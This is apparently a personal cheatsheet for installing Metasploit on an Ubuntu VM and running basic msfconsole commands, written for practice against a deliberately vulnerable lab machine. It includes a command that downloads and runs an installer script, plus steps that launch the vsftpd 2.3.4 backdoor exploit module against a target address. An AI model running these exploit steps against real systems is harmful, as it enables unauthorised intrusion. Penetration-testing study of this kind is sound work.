Using metasploit for pen testing - on ubuntu 22.04 vm

Install

From: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Optional: set up a dodgy VM you can target with exploits https://docs.rapid7.com/metasploit/metasploitable-2/

Load up the console

/opt/metasploit-framework/bin/msfconsole

Quick CLI commands cheatsheet

# show the banner
banner

# check the exploits available 
show exploits 

# search for exploits relevant
search linux
search apache
search mysql 
etc

# info on exploits (output from above)
info exploit/unix/ssh/tectia_passwd_changereq

# use an exploit


# run map
map -F -sV ip.add.ress

# search service version 
search vsftp

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost ip.add.ress
run

Using metasploit for pen testing - on ubuntu 22.04 vm

Install

Load up the console

Quick CLI commands cheatsheet

Navigation menu

Search